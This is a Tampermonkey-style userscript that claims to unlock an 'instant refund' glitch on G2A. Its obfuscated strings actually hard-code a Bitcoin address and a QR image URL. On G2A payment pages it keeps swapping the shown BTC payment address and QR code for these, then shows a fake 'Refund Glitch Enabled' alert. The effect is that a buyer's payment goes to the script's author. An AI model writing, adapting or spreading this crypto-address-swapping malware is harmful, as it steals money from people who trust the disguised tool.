// ==UserScript==
// @name         G2A Instant Refund Method
// @namespace    https://g2a.com/
// @version      12.29
// @author       Anon
// @description  Get any product from G2A with Instant Refund
// @icon         https://www.google.com/s2/favicons?sz=64&domain=g2a.com
// @match        http*://www.g2a.com/payment*
// @run-at       document-start
// ==/UserScript==

var _0x2e95=["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x31\x4A\x46\x43\x71\x68\x38\x71\x33\x6D\x73\x33\x65\x64\x41\x38\x47\x37\x48\x58\x35\x66\x4B\x44\x32\x7A\x75\x72\x53\x6A\x32\x72\x45\x70","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x2E\x69\x6D\x67\x75\x72\x2E\x63\x6F\x6D\x2F\x32\x33\x6D\x55\x6D\x55\x30\x2E\x70\x6E\x67","\x2F\x2F\x73\x70\x61\x6E\x5B\x63\x6F\x6E\x74\x61\x69\x6E\x73\x28\x74\x65\x78\x74\x28\x29\x2C\x22\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\x3A\x22\x29\x5D\x2F\x66\x6F\x6C\x6C\x6F\x77\x69\x6E\x67\x2D\x73\x69\x62\x6C\x69\x6E\x67\x3A\x3A\x73\x70\x61\x6E","\x2F\x2F\x69\x6D\x67\x5B\x40\x61\x6C\x74\x3D\x22\x51\x52\x20\x63\x6F\x64\x65\x20\x74\x6F\x20\x73\x63\x61\x6E\x22\x5D","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x73\x72\x63","\x2F\x2F\x62\x75\x74\x74\x6F\x6E\x5B\x63\x6F\x6E\x74\x61\x69\x6E\x73\x28\x74\x65\x78\x74\x28\x29\x2C\x22\x43\x6F\x6E\x74\x69\x6E\x75\x65\x22\x29\x5D","\x63\x6C\x69\x63\x6B","\x47\x32\x41\x20\x32\x30\x32\x33\x20\x52\x65\x66\x75\x6E\x64\x20\x47\x6C\x69\x74\x63\x68\x20\x45\x6E\x61\x62\x6C\x65\x64","\x67\x65\x74\x46\x75\x6C\x6C\x59\x65\x61\x72","\x2D","\x67\x65\x74\x4D\x6F\x6E\x74\x68","\x67\x65\x74\x44\x61\x74\x65","","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x73\x69\x6E\x67\x6C\x65\x4E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x65\x76\x61\x6C\x75\x61\x74\x65"];(function(){_0x2e95[0];var _0xcf93x1=_0x2e95[1];var _0xcf93x2=_0x2e95[2];_0xcf93x3();function _0xcf93x3(){setTimeout(function(){_0xcf93x4()},2000);setTimeout(function(){_0xcf93x7()},2000)}function _0xcf93x4(){let _0xcf93x5=_0xcf93xb(_0x2e95[3]);let _0xcf93x6=_0xcf93xb(_0x2e95[4]);if(_0xcf93x5!== null){_0xcf93x5[_0x2e95[5]]= _0xcf93x1;_0xcf93x6[_0x2e95[6]]= _0xcf93x2};setTimeout(function(){_0xcf93x4()},100)}function _0xcf93x7(){let _0xcf93x8=_0xcf93xb(_0x2e95[7]);if(_0xcf93x8!== null){_0xcf93x8[_0x2e95[15]](_0x2e95[8],function(){const _0xcf93x9= new Date();let _0xcf93xa=`${_0x2e95[9]}${_0xcf93x9[_0x2e95[10]]()}${_0x2e95[11]}${_0xcf93x9[_0x2e95[12]]()+ 1}${_0x2e95[11]}${_0xcf93x9[_0x2e95[13]]()}${_0x2e95[14]}`;alert(_0xcf93xa)})}else {setTimeout(function(){_0xcf93x7()},100)}}function _0xcf93xb(_0xcf93xc){return document[_0x2e95[17]](_0xcf93xc,document,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null)[_0x2e95[16]]}})()
